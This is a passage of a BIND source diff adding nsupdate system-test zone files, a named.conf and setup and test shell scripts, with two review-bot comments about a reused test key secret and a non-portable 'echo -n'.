krb5-subdomain _tcp.example.com SRV; + }; +}; diff --git a/bin/tests/system/nsupdate/ns9/dns.keytab b/bin/tests/system/nsupdate/ns9/dns.keytab Binary files differnew file mode 100644 index 0000000..470317f --- /dev/null +++ b/bin/tests/system/nsupdate/ns9/dns.keytab diff --git a/bin/tests/system/nsupdate/ns9/example.com.db.in b/bin/tests/system/nsupdate/ns9/example.com.db.in new file mode 100644 index 0000000..cb3fae5 --- /dev/null +++ b/bin/tests/system/nsupdate/ns9/example.com.db.in 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns9.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns9 +ns9 A 10.53.0.9 diff --git a/bin/tests/system/nsupdate/ns9/in-addr.db.in b/bin/tests/system/nsupdate/ns9/in-addr.db.in new file mode 100644 index 0000000..cb3fae5 --- /dev/null +++ b/bin/tests/system/nsupdate/ns9/in-addr.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns9.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns9 +ns9 A 10.53.0.9 diff --git a/bin/tests/system/nsupdate/ns9/machine.ccache b/bin/tests/system/nsupdate/ns9/machine.ccache Binary files differnew file mode 100644 index 0000000..2b59cec --- /dev/null +++ b/bin/tests/system/nsupdate/ns9/machine.ccache diff --git a/bin/tests/system/nsupdate/ns9/named.conf.in b/bin/tests/system/nsupdate/ns9/named.conf.in new file mode 100644 index 0000000..5115b15 --- /dev/null 
+++ b/bin/tests/system/nsupdate/ns9/named.conf.in
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.9;
+ notify-source 10.53.0.9;
+ transfer-source 10.53.0.9;
+ port @PORT@;
+ pid-file "named.pid";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.9; };
+ recursion no;
+ notify yes;
+ minimal-responses no;
+ @TKEY_CONFIGURATION@
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+key subkey {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "in-addr.arpa" {
+ type primary;
+ file "in-addr.db";
+ update-policy { grant EXAMPLE.COM ms-subdomain . PTR; };
+};
+
+zone "example.com" {
+ type primary;
+ file "example.com.db";
+ update-policy {
+ grant EXAMPLE.COM ms-self . ANY;
+ grant EXAMPLE.COM ms-subdomain _tcp.example.com SRV;
+ };
+};
+
+zone "denyname.example" {
+ type master;
+ file "denyname.example.db";
+ update-policy {
+ deny subkey name denyname.example;
+ grant subkey subdomain denyname.example;
+ };
+};
diff --git a/bin/tests/system/nsupdate/prereq.sh b/bin/tests/system/nsupdate/prereq.sh
new file mode 100644
index 0000000..1079c7e
--- /dev/null
+++ b/bin/tests/system/nsupdate/prereq.sh
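Review bot: In ns9/named.conf.in the new `subkey` has the same secret as `rndc_key` (`1234abcd8765` in both blocks), so anyone holding the update key that the `denyname.example` update-policy is meant to restrict also knows the secret that authenticates to the `controls` channel. Giving `subkey` its own value, e.g. `secret "<distinct-test-secret>";` (placeholder), keeps the update-policy test independent of control access; whatever supplies the key on the client side, outside this hunk, would need the same value. Separately, `denyname.example` is declared with `type master;` while the other zones in this file use `type primary;`; I would change it to `type primary;` for consistency.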
@@ -0,0 +1,28 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION >= 0.69 && $Net::DNS::VERSION <= 0.70);' 2>/dev/null
+ then
+ :
+ else
+ echo_i "Net::DNS versions 0.69 to 0.70 have bugs that cause this test to fail: please update." >&2
+ exit 1
+ fi
+fi
+
+exit 0
diff --git a/bin/tests/system/nsupdate/setup.sh b/bin/tests/system/nsupdate/setup.sh
new file mode 100644
index 0000000..fac39d4
--- /dev/null
+++ b/bin/tests/system/nsupdate/setup.sh
@@ -0,0 +1,106 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+#
+# jnl and database files MUST be removed before we start
+#
+$SHELL clean.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
+copy_setports ns8/named.conf.in ns8/named.conf
+
+# If "tkey-gssapi-credential" is set in the configuration and GSSAPI support is
+# not available, named will refuse to start. As the test system framework does
+# not support starting named instances conditionally, ensure that
+# "tkey-gssapi-credential" is only present in named.conf if GSSAPI support is
+# available.
+copy_setports ns9/named.conf.in ns9/named.conf.in.tkey +copy_setports ns10/named.conf.in ns10/named.conf.in.tkey +if $FEATURETEST --gssapi; then + sed 's|@TKEY_CONFIGURATION@|tkey-gssapi-credential "DNS/ns9.example.com@EXAMPLE.COM";|' ns9/named.conf.in.tkey > ns9/named.conf + sed 's|@TKEY_CONFIGURATION@|tkey-gssapi-credential "DNS/ns10.example.com@EXAMPLE.COM";|' ns10/named.conf.in.tkey > ns10/named.conf +else + sed 's|@TKEY_CONFIGURATION@||' ns9/named.conf.in.tkey > ns9/named.conf + sed 's|@TKEY_CONFIGURATION@||' ns10/named.conf.in.tkey > ns10/named.conf +fi +rm -f ns9/named.conf.in.tkey +rm -f ns10/named.conf.in.tkey + +copy_setports verylarge.in verylarge + +cp -f ns1/example1.db ns1/example.db +sed 's/example.nil/other.nil/g' ns1/example1.db > ns1/other.db +sed 's/example.nil/unixtime.nil/g' ns1/example1.db > ns1/unixtime.db +sed 's/example.nil/yyyymmddvv.nil/g' ns1/example1.db > ns1/yyyymmddvv.db +sed 's/example.nil/keytests.nil/g' ns1/example1.db > ns1/keytests.db +cp -f ns3/example.db.in ns3/example.db +cp -f ns3/too-big.test.db.in ns3/too-big.test.db + +# update_test.pl has its own zone file because it +# requires a specific NS record set. +cat <<\EOF >ns1/update.db +$ORIGIN . +$TTL 300 ; 5 minutes +update.nil IN SOA ns1.example.nil. hostmaster.example.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +update.nil. NS ns1.update.nil. +ns1.update.nil. A 10.53.0.2 +ns2.update.nil. 
AAAA ::1 +EOF + +$DDNSCONFGEN -q -z example.nil > ns1/ddns.key + +if $FEATURETEST --md5; then + $DDNSCONFGEN -q -a hmac-md5 -k md5-key -z keytests.nil > ns1/md5.key +else + echo -n > ns1/md5.key +fi +$DDNSCONFGEN -q -a hmac-sha1 -k sha1-key -z keytests.nil > ns1/sha1.key +$DDNSCONFGEN -q -a hmac-sha224 -k sha224-key -z keytests.nil > ns1/sha224.key +$DDNSCONFGEN -q -a hmac-sha256 -k sha256-key -z keytests.nil > ns1/sha256.key +$DDNSCONFGEN -q -a hmac-sha384 -k sha384-key -z keytests.nil > ns1/sha384.key +$DDNSCONFGEN -q -a hmac-sha512 -k sha512-key -z keytests.nil > ns1/sha512.key + +(cd ns3; $SHELL -e sign.sh) + +cp -f ns1/many.test.db.in ns1/many.test.db + +cp ns1/sample.db.in ns1/sample.db +cp ns2/sample.db.in ns2/sample.db + +cp -f ns1/maxjournal.db.in ns1/maxjournal.db + +cp -f ns5/local.db.in ns5/local.db +cp -f ns6/in-addr.db.in ns6/in-addr.db +cp -f ns7/in-addr.db.in ns7/in-addr.db +cp -f ns7/example.com.db.in ns7/example.com.db +cp -f ns8/in-addr.db.in ns8/in-addr.db +cp -f ns8/example.com.db.in ns8/example.com.db +cp -f ns9/in-addr.db.in ns9/in-addr.db +cp -f ns9/example.com.db.in ns9/example.com.db +cp -f ns9/example.com.db.in ns9/denyname.example.db +cp -f ns10/in-addr.db.in ns10/in-addr.db +cp -f ns10/example.com.db.in ns10/example.com.db diff --git a/bin/tests/system/nsupdate/tests.sh b/bin/tests/system/nsupdate/tests.sh new file mode 100755 index 0000000..2cf23ac --- /dev/null +++ b/bin/tests/system/nsupdate/tests.sh 
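Review bot: The `else` branch of the `$FEATURETEST --md5` check in setup.sh creates the empty key file with `echo -n > ns1/md5.key`, and `echo -n` is not portable under `#!/bin/sh`: a shell whose `echo` does not treat `-n` as an option writes the literal `-n` into the file. If ns1/named.conf includes that file (not visible in this hunk), named would then fail to parse it. `: > ns1/md5.key` creates the empty file in any POSIX shell.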
@@ -0,0 +1,1552 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +# +# Uncomment when creating credential cache files. +# +# KRB5_CONFIG="$(pwd)/krb/krb5.conf" +# +# Cd krb and run krb/setup.sh to create new keys. +# Run nsupdate system test. +# Kill the krb5kdc server started by krb/setup.sh. +# Check the expiry date on the cached machine.ccache with klist is in 2038. +# Comment out KRB5_CONFIG. +# Re-run nsupdate system test to confirm everything still works. +# git add and commit the resulting ns*/machine.ccache and ns*/dns.keytab files. +# Clean up krb. +# + +status=0 +n=0 + +nextpartreset ns3/named.run + +# wait for zone transfer to complete +tries=0 +while true; do + if [ $tries -eq 10 ] + then + exit 1 + fi + + if grep "example.nil/IN.*Transfer status" ns2/named.run > /dev/null + then + break + else + echo_i "zones are not fully loaded, waiting..." 
+ tries=$((tries + 1)) + sleep 1 + fi +done + +has_positive_response() { + zone=$1 + type=$2 + ns=$3 + $DIG $DIGOPTS +tcp +norec $zone $type @$ns > dig.out.post.test$n || return 1 + grep "status: NOERROR" dig.out.post.test$n > /dev/null || return 1 + grep "ANSWER: 0," dig.out.post.test$n > /dev/null && return 1 + return 0 +} + +ret=0 +echo_i "fetching first copy of zone before update" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.1 axfr > dig.out.ns1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "fetching second copy of zone before update" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.2 axfr > dig.out.ns2 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "comparing pre-update copies to known good data" +digcomp knowngood.ns1.before dig.out.ns1 || ret=1 +digcomp knowngood.ns1.before dig.out.ns2 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "ensure an unrelated zone is mentioned in its NOTAUTH log" +$NSUPDATE -k ns1/ddns.key > nsupdate.out 2>&1 << END && ret=1 +server 10.53.0.1 ${PORT} +zone unconfigured.test +update add unconfigured.test 600 IN A 10.53.0.1 +send +END +grep NOTAUTH nsupdate.out > /dev/null 2>&1 || ret=1 +grep ' unconfigured.test: not authoritative' ns1/named.run \ + > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "ensure a subdomain is mentioned in its NOTAUTH log" +$NSUPDATE -k ns1/ddns.key > nsupdate.out 2>&1 << END && ret=1 +server 10.53.0.1 ${PORT} +zone sub.sub.example.nil +update add sub.sub.sub.example.nil 600 IN A 10.53.0.1 +send +END +grep NOTAUTH nsupdate.out > /dev/null 2>&1 || ret=1 +grep ' sub.sub.example.nil: not authoritative' ns1/named.run \ + > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "updating zone" +# nsupdate will print a ">" prompt to stdout as it gets each input line. 
+$NSUPDATE -k ns1/ddns.key <<END > /dev/null || ret=1 +server 10.53.0.1 ${PORT} +update add updated.example.nil. 600 A 10.10.10.1 +add updated.example.nil. 600 TXT Foo +delete t.example.nil. + +END +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +echo_i "sleeping 5 seconds for server to incorporate changes" +sleep 5 + +ret=0 +echo_i "fetching first copy of zone after update" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.1 axfr > dig.out.ns1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "fetching second copy of zone after update" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.2 axfr > dig.out.ns2 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "comparing post-update copies to known good data" +digcomp knowngood.ns1.after dig.out.ns1 || ret=1 +digcomp knowngood.ns1.after dig.out.ns2 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "testing local update policy" +pre=$($DIG $DIGOPTS +short new.other.nil. @10.53.0.1 a) || ret=1 +[ -z "$pre" ] || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "updating zone" +# nsupdate will print a ">" prompt to stdout as it gets each input line. +$NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > /dev/null <<END || ret=1 +zone other.nil. +update add new.other.nil. 600 IN A 10.10.10.1 +send +END +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +echo_i "sleeping 5 seconds for server to incorporate changes" +sleep 5 + +ret=0 +echo_i "checking result of update" +post=$($DIG $DIGOPTS +short new.other.nil. 
@10.53.0.1 a) || ret=1 +[ "$post" = "10.10.10.1" ] || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "comparing post-update copy to known good data" +digcomp knowngood.ns1.after dig.out.ns1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "testing zone consistency checks" +# inserting an NS record without a corresponding A or AAAA record should fail +$NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > nsupdate.out 2>&1 << END && ret=1 +update add other.nil. 600 in ns ns3.other.nil. +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 || ret=1 +# ...but should work if an A record is inserted first: +$NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > nsupdate.out 2>&1 << END || ret=1 +update add ns4.other.nil 600 in a 10.53.0.1 +send +update add other.nil. 600 in ns ns4.other.nil. +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 && ret=1 +# ...or if an AAAA record does: +$NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > nsupdate.out 2>&1 << END || ret=1 +update add ns5.other.nil 600 in aaaa 2001:db8::1 +send +update add other.nil. 600 in ns ns5.other.nil. +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 && ret=1 +# ...or if the NS and A/AAAA are inserted together: +$NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > nsupdate.out 2>&1 << END || ret=1 +update add other.nil. 600 in ns ns6.other.nil. 
+update add ns6.other.nil 600 in a 10.53.0.1 +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 && ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +echo_i "sleeping 5 seconds for server to incorporate changes" +sleep 5 + +ret=0 +echo_i "checking result of update" +$DIG $DIGOPTS +short @10.53.0.1 ns other.nil > dig.out.ns1 || ret=1 +grep ns3.other.nil dig.out.ns1 > /dev/null 2>&1 && ret=1 +grep ns4.other.nil dig.out.ns1 > /dev/null 2>&1 || ret=1 +grep ns5.other.nil dig.out.ns1 > /dev/null 2>&1 || ret=1 +grep ns6.other.nil dig.out.ns1 > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "ensure 'check-mx ignore' allows adding MX records containing an address without a warning" +$NSUPDATE -k ns1/ddns.key > nsupdate.out 2>&1 << END || ret=1 +server 10.53.0.1 ${PORT} +update add mx03.example.nil 600 IN MX 10 10.53.0.1 +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 && ret=1 +grep "mx03.example.nil/MX:.*MX is an address" ns1/named.run > /dev/null 2>&1 && ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "ensure 'check-mx warn' allows adding MX records containing an address with a warning" +$NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > nsupdate.out 2>&1 << END || ret=1 +update add mx03.other.nil 600 IN MX 10 10.53.0.1 +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 && ret=1 +grep "mx03.other.nil/MX:.*MX is an address" ns1/named.run > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "ensure 'check-mx fail' prevents adding MX records containing an address with a warning" +$NSUPDATE > nsupdate.out 2>&1 << END && ret=1 +server 10.53.0.1 ${PORT} +update add mx03.update.nil 600 IN MX 10 10.53.0.1 +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 || ret=1 +grep "mx03.update.nil/MX:.*MX is an address" ns1/named.run > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "check SIG(0) key is accepted" +key=$($KEYGEN 
-q -a ${DEFAULT_ALGORITHM} -T KEY -n ENTITY xxx) +echo "" | $NSUPDATE -k ${key}.private > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check TYPE=0 update is rejected by nsupdate ($n)" +$NSUPDATE <<END > nsupdate.out 2>&1 && ret=1 + server 10.53.0.1 ${PORT} + ttl 300 + update add example.nil. in type0 "" + send +END +grep "unknown class/type" nsupdate.out > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check TYPE=0 prerequisite is handled ($n)" +$NSUPDATE -k ns1/ddns.key <<END > nsupdate.out 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + prereq nxrrset example.nil. type0 + send +END +$DIG $DIGOPTS +tcp version.bind txt ch @10.53.0.1 > dig.out.ns1.$n +grep "status: NOERROR" dig.out.ns1.$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that TYPE=0 update is handled ($n)" +echo "a0e4280000010000000100000000060001c00c000000fe000000000000" | +$PERL ../packet.pl -a 10.53.0.1 -p ${PORT} -t tcp > /dev/null || ret=1 +$DIG $DIGOPTS +tcp version.bind txt ch @10.53.0.1 > dig.out.ns1.$n +grep "status: NOERROR" dig.out.ns1.$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that TYPE=0 additional data is handled ($n)" +echo "a0e4280000010000000000010000060001c00c000000fe000000000000" | +$PERL ../packet.pl -a 10.53.0.1 -p ${PORT} -t tcp > /dev/null || ret=1 +$DIG $DIGOPTS +tcp version.bind txt ch @10.53.0.1 > dig.out.ns1.$n +grep "status: NOERROR" dig.out.ns1.$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that update to undefined class is handled ($n)" +echo "a0e4280000010001000000000000060101c00c000000fe000000000000" | +$PERL ../packet.pl -a 10.53.0.1 -p ${PORT} -t tcp > /dev/null || ret=1 +$DIG $DIGOPTS +tcp version.bind txt ch @10.53.0.1 > dig.out.ns1.$n +grep "status: NOERROR" 
dig.out.ns1.$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that address family mismatch is handled ($n)" +$NSUPDATE <<END > /dev/null 2>&1 && ret=1 +server ::1 +local 127.0.0.1 +update add 600 txt.example.nil in txt "test" +send +END +[ $ret = 0 ] || { echo_i "failed"; status=1; } + + +n=$((n + 1)) +ret=0 +echo_i "check that unixtime serial number is correctly generated ($n)" +$DIG $DIGOPTS +short unixtime.nil. soa @10.53.0.1 > dig.out.old.test$n || ret=1 +oldserial=$(awk '{print $3}' dig.out.old.test$n) || ret=1 +start=$($PERL -e 'print time()."\n";') +$NSUPDATE <<END > /dev/null 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + ttl 600 + update add new.unixtime.nil in a 1.2.3.4 + send +END +now=$($PERL -e 'print time()."\n";') +sleep 1 +$DIG $DIGOPTS +short unixtime.nil. soa @10.53.0.1 > dig.out.new.test$n || ret=1 +serial=$(awk '{print $3}' dig.out.new.test$n) || ret=1 +[ "$oldserial" = "$serial" ] && { echo_i "oldserial == serial"; ret=1; } +if [ "$serial" -lt "$start" ]; then + echo_i "out-of-range serial=$serial < start=$start"; ret=1; +elif [ "$serial" -gt "$now" ]; then + echo_i "out-of-range serial=$serial > now=$now"; ret=1; +fi +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + n=$((n + 1)) + ret=0 + echo_i "running update.pl test ($n)" + $PERL update_test.pl -s 10.53.0.1 -p ${PORT} update.nil. > perl.update_test.out || ret=1 + [ $ret -eq 1 ] && { echo_i "failed"; status=1; } + + if $PERL -e 'use Net::DNS; die "Net::DNS too old ($Net::DNS::VERSION < 1.01)" if ($Net::DNS::VERSION < 1.01)' > /dev/null + then + n=$((n + 1)) + ret=0 + echo_i "check for too many NSEC3 iterations log ($n)" + grep "updating zone 'update.nil/IN': too many NSEC3 iterations (151)" ns1/named.run > /dev/null || ret=1 + [ $ret -eq 1 ] && { echo_i "failed"; status=1; } + fi +else + echo_i "The second part of this test requires the Net::DNS library." 
>&2 +fi + +n=$((n + 1)) +ret=0 +echo_i "fetching first copy of test zone ($n)" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.1 axfr > dig.out.ns1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "fetching second copy of test zone ($n)" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.2 axfr > dig.out.ns2 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "comparing zones ($n)" +digcomp dig.out.ns1 dig.out.ns2 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +echo_i "SIGKILL and restart server ns1" +cd ns1 +$KILL -KILL $(cat named.pid) +rm named.pid +cd .. +sleep 10 +if + start_server --noclean --restart --port ${PORT} ns1 +then + echo_i "restarted server ns1" +else + echo_i "could not restart server ns1" + exit 1 +fi +sleep 10 + +n=$((n + 1)) +ret=0 +echo_i "fetching ns1 after hard restart ($n)" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.1 axfr > dig.out.ns1.after || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "comparing zones ($n)" +digcomp dig.out.ns1 dig.out.ns1.after || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +echo_i "begin RT #482 regression test" + +n=$((n + 1)) +ret=0 +echo_i "update primary ($n)" +$NSUPDATE -k ns1/ddns.key <<END > /dev/null || ret=1 +server 10.53.0.1 ${PORT} +update add updated2.example.nil. 600 A 10.10.10.2 +update add updated2.example.nil. 600 TXT Bar +update delete c.example.nil. +send +END +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +sleep 5 + +if [ ! 
"$CYGWIN" ]; then + echo_i "SIGHUP secondary" + $KILL -HUP $(cat ns2/named.pid) +else + echo_i "reload secondary" + rndc_reload ns2 10.53.0.2 +fi + +sleep 5 + +n=$((n + 1)) +ret=0 +echo_i "update primary again ($n)" +$NSUPDATE -k ns1/ddns.key <<END > /dev/null || ret=1 +server 10.53.0.1 ${PORT} +update add updated3.example.nil. 600 A 10.10.10.3 +update add updated3.example.nil. 600 TXT Zap +del d.example.nil. +send +END +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +sleep 5 + +if [ ! "$CYGWIN" ]; then + echo_i "SIGHUP secondary again" + $KILL -HUP $(cat ns2/named.pid) +else + echo_i "reload secondary again" + rndc_reload ns2 10.53.0.2 +fi + +sleep 5 + +n=$((n + 1)) +echo_i "check to 'out of sync' message ($n)" +if grep "out of sync" ns2/named.run +then + echo_i "failed (found 'out of sync')" + status=1 +fi + +echo_i "end RT #482 regression test" + +n=$((n + 1)) +ret=0 +echo_i "start NSEC3PARAM changes via UPDATE on a unsigned zone test ($n)" +$NSUPDATE << EOF +server 10.53.0.3 ${PORT} +update add example 3600 nsec3param 1 0 0 - +send +EOF + +# the zone is not signed. The nsec3param records should be removed. +# this also proves that the server is still running. 
+$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocmd +norec example.\ + @10.53.0.3 nsec3param > dig.out.ns3.$n || ret=1 +grep "ANSWER: 0," dig.out.ns3.$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns3.$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "change the NSEC3PARAM ttl via update ($n)" +$NSUPDATE << EOF +server 10.53.0.3 ${PORT} +update add nsec3param.test 3600 NSEC3PARAM 1 0 1 - +send +EOF + +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocmd +norec nsec3param.test.\ + @10.53.0.3 nsec3param > dig.out.ns3.$n || ret=1 +grep "ANSWER: 1," dig.out.ns3.$n > /dev/null || ret=1 +grep "3600.*NSEC3PARAM" dig.out.ns3.$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns3.$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "add a new NSEC3PARAM via update ($n)" +$NSUPDATE << EOF +server 10.53.0.3 ${PORT} +update add nsec3param.test 3600 NSEC3PARAM 1 0 4 - +send +EOF + +_ret=1 +for i in 0 1 2 3 4 5 6 7 8 9; do + $DIG $DIGOPTS +tcp +norec +time=1 +tries=1 @10.53.0.3 nsec3param.test. NSEC3PARAM > dig.out.ns3.$n || _ret=1 + if grep "ANSWER: 2," dig.out.ns3.$n > /dev/null; then + _ret=0 + break + fi + sleep 1 +done + +if [ $_ret -ne 0 ]; then ret=1; fi +grep "NSEC3PARAM 1 0 4 -" dig.out.ns3.$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=$((ret + status)); fi + +n=$((n + 1)) +ret=0 +echo_i "add, delete and change the ttl of the NSEC3PARAM rrset via update ($n)" +$NSUPDATE << EOF +server 10.53.0.3 ${PORT} +update delete nsec3param.test NSEC3PARAM +update add nsec3param.test 7200 NSEC3PARAM 1 0 5 - +send +EOF + +_ret=1 +for i in 0 1 2 3 4 5 6 7 8 9; do + $DIG $DIGOPTS +tcp +norec +time=1 +tries=1 @10.53.0.3 nsec3param.test. 
